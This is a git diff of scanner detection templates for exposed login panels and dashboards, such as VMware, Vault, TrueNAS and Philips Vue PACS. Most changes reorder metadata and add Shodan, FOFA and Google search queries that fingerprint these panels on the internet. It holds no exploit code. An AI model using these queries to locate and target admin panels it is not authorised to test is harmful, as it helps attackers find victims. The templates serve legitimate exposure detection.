cpe:2.3:a:tiki:tikiwiki_cms\/groupware:*:*:*:*:*:*:*:* metadata: max-request: 2 - product: tikiwiki_cms\/groupware vendor: tiki + product: tikiwiki_cms\/groupware + shodan-query: http.html:"tiki wiki" + fofa-query: body="tiki wiki" tags: panel,tikiwiki,tiki http: diff --git a/http/exposed-panels/tiny-file-manager.yaml b/http/exposed-panels/tiny-file-manager.yaml index cfcfdb2657..b13e2134ff 100644 --- a/http/exposed-panels/tiny-file-manager.yaml +++ b/http/exposed-panels/tiny-file-manager.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"Tiny File Manager" - verified: true zoomeye-query: app:"Tiny File Manager" tags: panel,filemanager,login,detect diff --git a/http/exposed-panels/tiny-rss-panel.yaml b/http/exposed-panels/tiny-rss-panel.yaml index 8686589488..e869f18097 100644 --- a/http/exposed-panels/tiny-rss-panel.yaml +++ b/http/exposed-panels/tiny-rss-panel.yaml @@ -1,19 +1,19 @@ id: tiny-rss-panel -info: - name: Tiny RSS Panel - Detect - author: userdehghani - severity: info - description: | - Tiny Tiny RSS is a free RSS feed reader - reference: - - https://tt-rss.org/ - metadata: - verified: true - max-request: 1 - shodan-query: http.favicon.hash:-418614327 - tags: panel,tiny-rss,login,detect - +info: + name: Tiny RSS Panel - Detect + author: userdehghani + severity: info + description: | + Tiny Tiny RSS is a free RSS feed reader + reference: + - https://tt-rss.org/ + metadata: + verified: true + max-request: 1 + shodan-query: http.favicon.hash:-418614327 + tags: panel,tiny-rss,login,detect + http: - method: GET path: diff --git a/http/exposed-panels/tixeo-panel.yaml b/http/exposed-panels/tixeo-panel.yaml index 6189dc45c6..44baec47d1 100644 --- a/http/exposed-panels/tixeo-panel.yaml +++ b/http/exposed-panels/tixeo-panel.yaml @@ -1,19 +1,18 @@ id: tixeo-panel -info: - name: Tixeo Login Panel - Detect - author: righettod - severity: info - description: | - Tixeo login panel was detected. - reference: - - https://www.tixeo.com/en/ - metadata: - verified: true - max-request: 1 - shodan-query: http.title:"tixeo" - tags: panel,tixeo,login,detect - +info: + name: Tixeo Login Panel - Detect + author: righettod + severity: info + description: | + Tixeo login panel was detected. + reference: + - https://www.tixeo.com/en/ + metadata: + verified: true + max-request: 3 + shodan-query: "http.title:\"tixeo\"" + tags: panel,tixeo,login,detect http: - method: GET path: diff --git a/http/exposed-panels/tomcat/tomcat-exposed-docs.yaml b/http/exposed-panels/tomcat/tomcat-exposed-docs.yaml index d25af98bf6..d97e7ba948 100644 --- a/http/exposed-panels/tomcat/tomcat-exposed-docs.yaml +++ b/http/exposed-panels/tomcat/tomcat-exposed-docs.yaml @@ -8,9 +8,17 @@ info: cpe: cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: tomcat - shodan-query: title:"Apache Tomcat" vendor: apache + product: tomcat + shodan-query: + - title:"Apache Tomcat" + - http.title:"apache tomcat" + - http.html:"apache tomcat" + - cpe:"cpe:2.3:a:apache:tomcat" + fofa-query: + - body="apache tomcat" + - title="apache tomcat" + google-query: intitle:"apache tomcat" tags: version,tomcat,docs,panel,apache http: diff --git a/http/exposed-panels/tooljet-panel.yaml b/http/exposed-panels/tooljet-panel.yaml index 2a6cb9cf4e..fe014b06f3 100644 --- a/http/exposed-panels/tooljet-panel.yaml +++ b/http/exposed-panels/tooljet-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 2 shodan-query: title:"ToolJet - Dashboard" - verified: true tags: panel,tooljet http: diff --git a/http/exposed-panels/total-web-solutions-panel.yaml b/http/exposed-panels/total-web-solutions-panel.yaml index f8c260812e..393436e1ba 100644 --- a/http/exposed-panels/total-web-solutions-panel.yaml +++ b/http/exposed-panels/total-web-solutions-panel.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - google-query: intitle:"Total Web Solutions" + "Meter Name" - max-request: 1 verified: true + max-request: 1 + google-query: intitle:"Total Web Solutions" + "Meter Name" tags: panel,edb http: diff --git a/http/exposed-panels/totemomail-panel.yaml b/http/exposed-panels/totemomail-panel.yaml index d673843c0c..591458bfb1 100644 --- a/http/exposed-panels/totemomail-panel.yaml +++ b/http/exposed-panels/totemomail-panel.yaml @@ -12,11 +12,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:totemo:totemomail:*:*:*:*:*:*:*:* metadata: - google-query: intext:"totemomail" inurl:responsiveUI - max-request: 2 - product: totemomail - vendor: totemo verified: true + max-request: 2 + vendor: totemo + product: totemomail + google-query: + - intext:"totemomail" inurl:responsiveUI + - intext:"totemomail" inurl:responsiveui + shodan-query: http.html:"totemomail" inurl:responsiveui + fofa-query: body="totemomail" inurl:responsiveui tags: totemomail,panel,totemo http: diff --git a/http/exposed-panels/tracer-sc-login.yaml b/http/exposed-panels/tracer-sc-login.yaml index 47875d98b1..2e6dd23eb3 100644 --- a/http/exposed-panels/tracer-sc-login.yaml +++ b/http/exposed-panels/tracer-sc-login.yaml @@ -13,8 +13,8 @@ info: cpe: cpe:2.3:h:trane:tracer_sc:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: tracer_sc vendor: trane + product: tracer_sc tags: tracer,trane,iot,panel,login http: diff --git a/http/exposed-panels/traefik-dashboard.yaml b/http/exposed-panels/traefik-dashboard.yaml index 3d62bfb352..b0a7b0471f 100644 --- a/http/exposed-panels/traefik-dashboard.yaml +++ b/http/exposed-panels/traefik-dashboard.yaml @@ -10,11 +10,13 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:traefik:traefik:*:*:*:*:*:*:*:* metadata: + verified: true max-request: 1 + vendor: traefik product: traefik shodan-query: http.title:"traefik" - vendor: traefik - verified: true + fofa-query: title="traefik" + google-query: intitle:"traefik" tags: panel,traefik http: diff --git a/http/exposed-panels/trendnet/trendnet-tew827dru-login.yaml b/http/exposed-panels/trendnet/trendnet-tew827dru-login.yaml index b6bbb15c16..fff5c7622e 100644 --- a/http/exposed-panels/trendnet/trendnet-tew827dru-login.yaml +++ b/http/exposed-panels/trendnet/trendnet-tew827dru-login.yaml @@ -11,9 +11,12 @@ info: cpe: cpe:2.3:o:trendnet:tew-827dru_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: tew-827dru_firmware - shodan-query: http.html:"TEW-827DRU" vendor: trendnet + product: tew-827dru_firmware + shodan-query: + - http.html:"TEW-827DRU" + - http.html:"tew-827dru" + fofa-query: body="tew-827dru" tags: panel,router,trendnet http: diff --git a/http/exposed-panels/truenas-scale-panel.yaml b/http/exposed-panels/truenas-scale-panel.yaml index 5c1cd79e52..813609f04c 100644 --- a/http/exposed-panels/truenas-scale-panel.yaml +++ b/http/exposed-panels/truenas-scale-panel.yaml @@ -11,11 +11,14 @@ info: classification: cpe: cpe:2.3:h:ixsystems:truenas:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: truenas - shodan-query: html:"TrueNAS" - vendor: ixsystems verified: true + max-request: 1 + vendor: ixsystems + product: truenas + shodan-query: + - html:"TrueNAS" + - http.html:"truenas" + fofa-query: body="truenas" tags: login,panel,truenas,ixsystems http: diff --git a/http/exposed-panels/tufin-securetrack-login.yaml b/http/exposed-panels/tufin-securetrack-login.yaml index 115bb433e3..577e380610 100644 --- a/http/exposed-panels/tufin-securetrack-login.yaml +++ b/http/exposed-panels/tufin-securetrack-login.yaml @@ -12,11 +12,16 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:tufin:securetrack:*:*:*:*:*:*:*:* metadata: - google-query: intitle:"SecureTrack - Tufin Technologies" max-request: 1 - product: securetrack - shodan-query: http.title:"SecureTrack - Tufin Technologies" vendor: tufin + product: securetrack + shodan-query: + - http.title:"SecureTrack - Tufin Technologies" + - http.title:"securetrack - tufin technologies" + google-query: + - intitle:"SecureTrack - Tufin Technologies" + - intitle:"securetrack - tufin technologies" + fofa-query: title="securetrack - tufin technologies" tags: panel,tufin http: diff --git a/http/exposed-panels/tup-openframe.yaml b/http/exposed-panels/tup-openframe.yaml index 7330750ff1..25cdb143b4 100644 --- a/http/exposed-panels/tup-openframe.yaml +++ b/http/exposed-panels/tup-openframe.yaml @@ -7,9 +7,9 @@ info: reference: - https://www.facebook.com/photo/?fbid=642772827893240&set=a.467014098802448 metadata: + verified: true max-request: 1 shodan-query: http.favicon.hash:824580113 - verified: true tags: exposure,login,tup,openframe,panel http: diff --git a/http/exposed-panels/turnkey-openvpn.yaml b/http/exposed-panels/turnkey-openvpn.yaml index 7941d801ea..ba2f70bafa 100644 --- a/http/exposed-panels/turnkey-openvpn.yaml +++ b/http/exposed-panels/turnkey-openvpn.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.title:"TurnKey OpenVPN" - verified: true tags: panel,openvpn,turnkey,webshell,vpn http: diff --git a/http/exposed-panels/typo3-login.yaml b/http/exposed-panels/typo3-login.yaml index e15c90b43c..7dd4461e14 100644 --- a/http/exposed-panels/typo3-login.yaml +++ b/http/exposed-panels/typo3-login.yaml @@ -11,8 +11,9 @@ info: cpe: cpe:2.3:a:typo3:typo3:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: typo3 vendor: typo3 + product: typo3 + shodan-query: cpe:"cpe:2.3:a:typo3:typo3" tags: panel,typo3 http: diff --git a/http/exposed-panels/uipath-orchestrator-panel.yaml b/http/exposed-panels/uipath-orchestrator-panel.yaml index 6db7586ca4..fe416def0f 100644 --- a/http/exposed-panels/uipath-orchestrator-panel.yaml +++ b/http/exposed-panels/uipath-orchestrator-panel.yaml @@ -1,19 +1,19 @@ id: uipath-orchestrator-panel -info: - name: UiPath Orchestrator Login Panel - Detect - author: righettod - severity: info - description: | - UiPath Orchestrator login panel was detected. - reference: - - https://www.uipath.com/ - metadata: - verified: true - max-request: 1 - shodan-query: http.title:"UiPath Orchestrator" - tags: panel,uipath,login,detect - +info: + name: UiPath Orchestrator Login Panel - Detect + author: righettod + severity: info + description: | + UiPath Orchestrator login panel was detected. + reference: + - https://www.uipath.com/ + metadata: + verified: true + max-request: 1 + shodan-query: http.title:"UiPath Orchestrator" + tags: panel,uipath,login,detect + http: - method: GET path: diff --git a/http/exposed-panels/umbraco-login.yaml b/http/exposed-panels/umbraco-login.yaml index 037fce3221..6641c03535 100644 --- a/http/exposed-panels/umbraco-login.yaml +++ b/http/exposed-panels/umbraco-login.yaml @@ -12,11 +12,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:umbraco:umbraco_cms:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: umbraco_cms - shodan-query: http.title:"Umbraco" - vendor: umbraco verified: true + max-request: 1 + vendor: umbraco + product: umbraco_cms + shodan-query: + - http.title:"Umbraco" + - http.title:"umbraco" + fofa-query: title="umbraco" + google-query: intitle:"umbraco" tags: panel,umbraco,detect http: diff --git a/http/exposed-panels/unauth-xproxy-dashboard.yaml b/http/exposed-panels/unauth-xproxy-dashboard.yaml index 8660d2645e..864c2b5ac1 100644 --- a/http/exposed-panels/unauth-xproxy-dashboard.yaml +++ b/http/exposed-panels/unauth-xproxy-dashboard.yaml @@ -9,8 +9,8 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - fofa-query: X-Proxy Dashboard max-request: 1 + fofa-query: X-Proxy Dashboard tags: xproxy,panel http: diff --git a/http/exposed-panels/unauth/tautulli-unauth.yaml b/http/exposed-panels/unauth/tautulli-unauth.yaml index 2bc6ad3aa1..57254fe1ad 100644 --- a/http/exposed-panels/unauth/tautulli-unauth.yaml +++ b/http/exposed-panels/unauth/tautulli-unauth.yaml @@ -7,11 +7,20 @@ info: classification: cpe: cpe:2.3:a:tautulli:tautulli:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: tautulli - shodan-query: title:"Tautulli - Home" - vendor: tautulli verified: true + max-request: 1 + vendor: tautulli + product: tautulli + shodan-query: + - title:"Tautulli - Home" + - http.title:"tautulli" + - http.title:"tautulli - home" + fofa-query: + - title="tautulli - home" + - title="tautulli" + google-query: + - intitle:"tautulli" + - intitle:"tautulli - home" tags: panel,misconfig,tautulli,unauth,exposure http: diff --git a/http/exposed-panels/unibox-panel.yaml b/http/exposed-panels/unibox-panel.yaml index 28b87df8d2..6dcfc42d98 100644 --- a/http/exposed-panels/unibox-panel.yaml +++ b/http/exposed-panels/unibox-panel.yaml @@ -6,9 +6,9 @@ info: severity: info description: Unibox Administrator panel was detected. metadata: + verified: true max-request: 1 shodan-query: http.favicon.hash:176427349 - verified: true tags: panel,unibox,login http: diff --git a/http/exposed-panels/unleash-panel.yaml b/http/exposed-panels/unleash-panel.yaml index 1aa5ff3ef6..e74d047992 100644 --- a/http/exposed-panels/unleash-panel.yaml +++ b/http/exposed-panels/unleash-panel.yaml @@ -1,19 +1,19 @@ id: unleash-panel -info: - name: Unleash Panel - Detect - author: userdehghani - severity: info - description: | - Open-source feature management solution built for developers. - reference: - - https://www.getunleash.io/ - metadata: - verified: true - max-request: 3 - shodan-query: http.favicon.hash:-608690655 - tags: panel,unleash,login,detect - +info: + name: Unleash Panel - Detect + author: userdehghani + severity: info + description: | + Open-source feature management solution built for developers. + reference: + - https://www.getunleash.io/ + metadata: + verified: true + max-request: 3 + shodan-query: http.favicon.hash:-608690655 + tags: panel,unleash,login,detect + http: - method: GET path: diff --git a/http/exposed-panels/untangle-admin-login.yaml b/http/exposed-panels/untangle-admin-login.yaml index 5adb744943..b506e0f956 100644 --- a/http/exposed-panels/untangle-admin-login.yaml +++ b/http/exposed-panels/untangle-admin-login.yaml @@ -13,11 +13,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:untangle:ng_firewall:*:*:*:*:*:*:*:* metadata: - max-request: 2 - product: ng_firewall - shodan-query: title:"Untangle Administrator Login" - vendor: untangle verified: true + max-request: 2 + vendor: untangle + product: ng_firewall + shodan-query: + - title:"Untangle Administrator Login" + - http.title:"untangle administrator login" + fofa-query: title="untangle administrator login" + google-query: intitle:"untangle administrator login" tags: panel,untangle,admin,login http: diff --git a/http/exposed-panels/uptime-kuma-panel.yaml b/http/exposed-panels/uptime-kuma-panel.yaml index c17bc03bce..9b9b86cd54 100644 --- a/http/exposed-panels/uptime-kuma-panel.yaml +++ b/http/exposed-panels/uptime-kuma-panel.yaml @@ -10,9 +10,9 @@ info: - https://github.com/louislam/uptime-kuma - https://github.com/louislam/uptime-kuma/wiki metadata: + verified: true max-request: 1 shodan-query: title:"Uptime Kuma" - verified: true tags: uptime,kuma,panel,login,detect http: diff --git a/http/exposed-panels/v2924-admin-panel.yaml b/http/exposed-panels/v2924-admin-panel.yaml index 23573436a5..a83409ca37 100644 --- a/http/exposed-panels/v2924-admin-panel.yaml +++ b/http/exposed-panels/v2924-admin-panel.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"V2924" - verified: true tags: panel,v2924 http: diff --git a/http/exposed-panels/vault-panel.yaml b/http/exposed-panels/vault-panel.yaml index 4d8a4a720a..9e94d64469 100644 --- a/http/exposed-panels/vault-panel.yaml +++ b/http/exposed-panels/vault-panel.yaml @@ -10,11 +10,12 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:hashicorp:vault:*:*:*:*:*:*:*:* metadata: + verified: true max-request: 2 + vendor: hashicorp product: vault shodan-query: http.favicon.hash:-919788577 - vendor: hashicorp - verified: true + fofa-query: icon_hash=-919788577 tags: panel,vault,detect,hashicorp http: diff --git a/http/exposed-panels/veeam-backup-gcp.yaml b/http/exposed-panels/veeam-backup-gcp.yaml index ecbe9297f7..ed8181530b 100644 --- a/http/exposed-panels/veeam-backup-gcp.yaml +++ b/http/exposed-panels/veeam-backup-gcp.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"Veeam Backup for GCP" - verified: true tags: panel,google,cloud http: diff --git a/http/exposed-panels/veriz0wn-osint.yaml b/http/exposed-panels/veriz0wn-osint.yaml index c2c97ed9c6..fd7add9056 100644 --- a/http/exposed-panels/veriz0wn-osint.yaml +++ b/http/exposed-panels/veriz0wn-osint.yaml @@ -5,9 +5,9 @@ info: author: pussycat0x severity: info metadata: + verified: true max-request: 1 shodan-query: title:"Veriz0wn" - verified: true tags: veriz0wn,panel http: diff --git a/http/exposed-panels/verizon-router-panel.yaml b/http/exposed-panels/verizon-router-panel.yaml index 2ffeeb60b4..e0765fcc8a 100644 --- a/http/exposed-panels/verizon-router-panel.yaml +++ b/http/exposed-panels/verizon-router-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.title:"Verizon Router" - verified: true tags: panel,verizon,router http: diff --git a/http/exposed-panels/versa/versa-director-login.yaml b/http/exposed-panels/versa/versa-director-login.yaml index 989694d0c6..b716d40fa7 100644 --- a/http/exposed-panels/versa/versa-director-login.yaml +++ b/http/exposed-panels/versa/versa-director-login.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.title:"VERSA DIRECTOR Login" - verified: true tags: panel,versa,director http: diff --git a/http/exposed-panels/versa/versa-flexvnf-panel.yaml b/http/exposed-panels/versa/versa-flexvnf-panel.yaml index a95bc6df9d..2b44843199 100644 --- a/http/exposed-panels/versa/versa-flexvnf-panel.yaml +++ b/http/exposed-panels/versa/versa-flexvnf-panel.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.title:"Flex VNF Web-UI" - verified: true tags: panel,versa,flexvnf http: diff --git a/http/exposed-panels/vertex-tax-panel.yaml b/http/exposed-panels/vertex-tax-panel.yaml index eea0f2e2f1..e91b894b22 100644 --- a/http/exposed-panels/vertex-tax-panel.yaml +++ b/http/exposed-panels/vertex-tax-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.html:"Vertex Tax Installer" - verified: true tags: panel,vertex http: diff --git a/http/exposed-panels/vinchin-panel.yaml b/http/exposed-panels/vinchin-panel.yaml index d5795960f6..a091bb3702 100644 --- a/http/exposed-panels/vinchin-panel.yaml +++ b/http/exposed-panels/vinchin-panel.yaml @@ -8,9 +8,9 @@ info: classification: cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: html:"VinChin" - verified: true tags: panel,vinchin,login http: diff --git a/http/exposed-panels/virtua-software-panel.yaml b/http/exposed-panels/virtua-software-panel.yaml index d0dccf0088..39fa14dfd7 100644 --- a/http/exposed-panels/virtua-software-panel.yaml +++ b/http/exposed-panels/virtua-software-panel.yaml @@ -10,11 +10,12 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:virtuasoftware:cobranca:*:*:*:*:*:*:*:* metadata: + verified: true max-request: 1 + vendor: virtuasoftware product: cobranca shodan-query: http.favicon.hash:876876147 - vendor: virtuasoftware - verified: true + fofa-query: icon_hash=876876147 tags: panel,virtua,virtuasoftware http: diff --git a/http/exposed-panels/vistaweb-panel.yaml b/http/exposed-panels/vistaweb-panel.yaml index 65da46c490..690b2c7d70 100644 --- a/http/exposed-panels/vistaweb-panel.yaml +++ b/http/exposed-panels/vistaweb-panel.yaml @@ -9,8 +9,8 @@ info: reference: - https://resa.aero/solutions-operations-facturation/vista-web/ metadata: - max-request: 1 verified: true + max-request: 1 tags: panel,vistaweb,login http: diff --git a/http/exposed-panels/vmware-carbon-black-edr.yaml b/http/exposed-panels/vmware-carbon-black-edr.yaml index e20de1d02c..fbb41ec828 100644 --- a/http/exposed-panels/vmware-carbon-black-edr.yaml +++ b/http/exposed-panels/vmware-carbon-black-edr.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"VMware Carbon Black EDR" - verified: true tags: panel,vmware http: diff --git a/http/exposed-panels/vmware-cloud-availability.yaml b/http/exposed-panels/vmware-cloud-availability.yaml index 353f696c58..115145e512 100644 --- a/http/exposed-panels/vmware-cloud-availability.yaml +++ b/http/exposed-panels/vmware-cloud-availability.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"VMware Cloud Director Availability" - verified: true tags: panel,vmware http: diff --git a/http/exposed-panels/vmware-cloud-director.yaml b/http/exposed-panels/vmware-cloud-director.yaml index 1380db447f..841f738cc9 100644 --- a/http/exposed-panels/vmware-cloud-director.yaml +++ b/http/exposed-panels/vmware-cloud-director.yaml @@ -10,11 +10,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:vmware:cloud_director:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: cloud_director - shodan-query: title:"Welcome to VMware Cloud Director" - vendor: vmware verified: true + max-request: 1 + vendor: vmware + product: cloud_director + shodan-query: + - title:"Welcome to VMware Cloud Director" + - http.title:"welcome to vmware cloud director" + fofa-query: title="welcome to vmware cloud director" + google-query: intitle:"welcome to vmware cloud director" tags: panel,vmware http: diff --git a/http/exposed-panels/vmware-ftp-server.yaml b/http/exposed-panels/vmware-ftp-server.yaml index 05864f2e07..b3f7a7ec66 100644 --- a/http/exposed-panels/vmware-ftp-server.yaml +++ b/http/exposed-panels/vmware-ftp-server.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"VMWARE FTP SERVER" - verified: true tags: panel,vmware,ftp http: diff --git a/http/exposed-panels/vmware-hcx-login.yaml b/http/exposed-panels/vmware-hcx-login.yaml index a9389f2959..cf2b2eaa84 100644 --- a/http/exposed-panels/vmware-hcx-login.yaml +++ b/http/exposed-panels/vmware-hcx-login.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"VMware HCX" - verified: true tags: panel,vmware http: diff --git a/http/exposed-panels/vmware-horizon-daas.yaml b/http/exposed-panels/vmware-horizon-daas.yaml index 86a67e6f07..34bb35a4d9 100644 --- a/http/exposed-panels/vmware-horizon-daas.yaml +++ b/http/exposed-panels/vmware-horizon-daas.yaml @@ -7,11 +7,15 @@ info: classification: cpe: cpe:2.3:a:vmware:horizon_daas:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: horizon_daas - shodan-query: title:"Horizon DaaS" - vendor: vmware verified: true + max-request: 1 + vendor: vmware + product: horizon_daas + shodan-query: + - title:"Horizon DaaS" + - http.title:"horizon daas" + fofa-query: title="horizon daas" + google-query: intitle:"horizon daas" tags: panel,vmware http: diff --git a/http/exposed-panels/vmware-horizon-panel.yaml b/http/exposed-panels/vmware-horizon-panel.yaml index 43517b6cfc..0c80378c36 100644 --- a/http/exposed-panels/vmware-horizon-panel.yaml +++ b/http/exposed-panels/vmware-horizon-panel.yaml @@ -13,8 +13,8 @@ info: cpe: cpe:2.3:a:vmware:horizon:*:*:*:*:macos:*:*:* metadata: max-request: 2 - product: horizon vendor: vmware + product: horizon tags: horizon,vmware,edb,panel http: diff --git a/http/exposed-panels/vmware-nsx-login.yaml b/http/exposed-panels/vmware-nsx-login.yaml index 064c28594d..0ee1e6ed9e 100644 --- a/http/exposed-panels/vmware-nsx-login.yaml +++ b/http/exposed-panels/vmware-nsx-login.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: html:"vmw_nsx_logo-black-triangle-500w.png" - verified: true tags: panel,vmware http: diff --git a/http/exposed-panels/vmware-vcenter-converter-standalone.yaml b/http/exposed-panels/vmware-vcenter-converter-standalone.yaml index 0827631225..8d382cb834 100644 --- a/http/exposed-panels/vmware-vcenter-converter-standalone.yaml +++ b/http/exposed-panels/vmware-vcenter-converter-standalone.yaml @@ -10,11 +10,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:vmware:vcenter_converter_standalone:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: vcenter_converter_standalone - shodan-query: title:"VMware vCenter Converter Standalone" - vendor: vmware verified: true + max-request: 1 + vendor: vmware + product: vcenter_converter_standalone + shodan-query: + - title:"VMware vCenter Converter Standalone" + - http.title:"vmware vcenter converter standalone" + fofa-query: title="vmware vcenter converter standalone" + google-query: intitle:"vmware vcenter converter standalone" tags: panel,vmware,vcenter http: diff --git a/http/exposed-panels/vmware-vcloud-director.yaml b/http/exposed-panels/vmware-vcloud-director.yaml index 364fb6d974..8436c6124d 100644 --- a/http/exposed-panels/vmware-vcloud-director.yaml +++ b/http/exposed-panels/vmware-vcloud-director.yaml @@ -10,11 +10,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:vmware:vcloud_director:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: vcloud_director - shodan-query: title:"VMware vCloud Director" - vendor: vmware verified: true + max-request: 1 + vendor: vmware + product: vcloud_director + shodan-query: + - title:"VMware vCloud Director" + - http.title:"vmware vcloud director" + fofa-query: title="vmware vcloud director" + google-query: intitle:"vmware vcloud director" tags: panel,vmware,vcloud http: diff --git a/http/exposed-panels/vodafone-voxui-panel.yaml b/http/exposed-panels/vodafone-voxui-panel.yaml index 2f354b7a3d..3728e9b836 100644 --- a/http/exposed-panels/vodafone-voxui-panel.yaml +++ b/http/exposed-panels/vodafone-voxui-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"Vodafone Vox UI" - verified: true tags: panel,vodafone http: diff --git a/http/exposed-panels/voipmonitor-panel.yaml b/http/exposed-panels/voipmonitor-panel.yaml index 7fb69c1226..e621be1ebe 100644 --- a/http/exposed-panels/voipmonitor-panel.yaml +++ b/http/exposed-panels/voipmonitor-panel.yaml @@ -11,9 +11,13 @@ info: cpe: cpe:2.3:a:voipmonitor:voipmonitor:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: voipmonitor - shodan-query: http.title:"VoIPmonitor" vendor: voipmonitor + product: voipmonitor + shodan-query: + - http.title:"VoIPmonitor" + - http.title:"voipmonitor" + fofa-query: title="voipmonitor" + google-query: intitle:"voipmonitor" tags: panel,voipmonitor,login http: diff --git a/http/exposed-panels/vrealize-loginsight-panel.yaml b/http/exposed-panels/vrealize-loginsight-panel.yaml index ae74bdb53b..26678bc772 100644 --- a/http/exposed-panels/vrealize-loginsight-panel.yaml +++ b/http/exposed-panels/vrealize-loginsight-panel.yaml @@ -10,11 +10,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:vmware:vrealize_log_insight:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: vrealize_log_insight - shodan-query: title:"vRealize Log insight" - vendor: vmware verified: true + max-request: 1 + vendor: vmware + product: vrealize_log_insight + shodan-query: + - title:"vRealize Log insight" + - http.title:"vrealize log insight" + fofa-query: title="vrealize log insight" + google-query: intitle:"vrealize log insight" tags: panel,vmware,vrealize http: diff --git a/http/exposed-panels/vue-pacs-panel.yaml b/http/exposed-panels/vue-pacs-panel.yaml index c98e7e98cb..295b1571e3 100644 --- a/http/exposed-panels/vue-pacs-panel.yaml +++ b/http/exposed-panels/vue-pacs-panel.yaml @@ -11,11 +11,15 @@ info: classification: cpe: cpe:2.3:a:philips:vue_pacs:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: vue_pacs - shodan-query: http.title:"Vue PACS" - vendor: philips verified: true + max-request: 1 + vendor: philips + product: vue_pacs + shodan-query: + - http.title:"Vue PACS" + - http.title:"vue pacs" + fofa-query: title="vue pacs" + google-query: intitle:"vue pacs" tags: vue,pacs,panel,login,philips http: diff --git a/http/exposed-panels/wagtail-cms-detect.yaml b/http/exposed-panels/wagtail-cms-detect.yaml index f32b6c0a09..6300964646 100644 --- a/http/exposed-panels/wagtail-cms-detect.yaml +++ b/http/exposed-panels/wagtail-cms-detect.yaml @@ -10,11 +10,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:torchbox:wagtail:*:*:*:*:*:*:*:* metadata: - max-request: 2 - product: wagtail - shodan-query: title:"Wagtail - Sign in" - 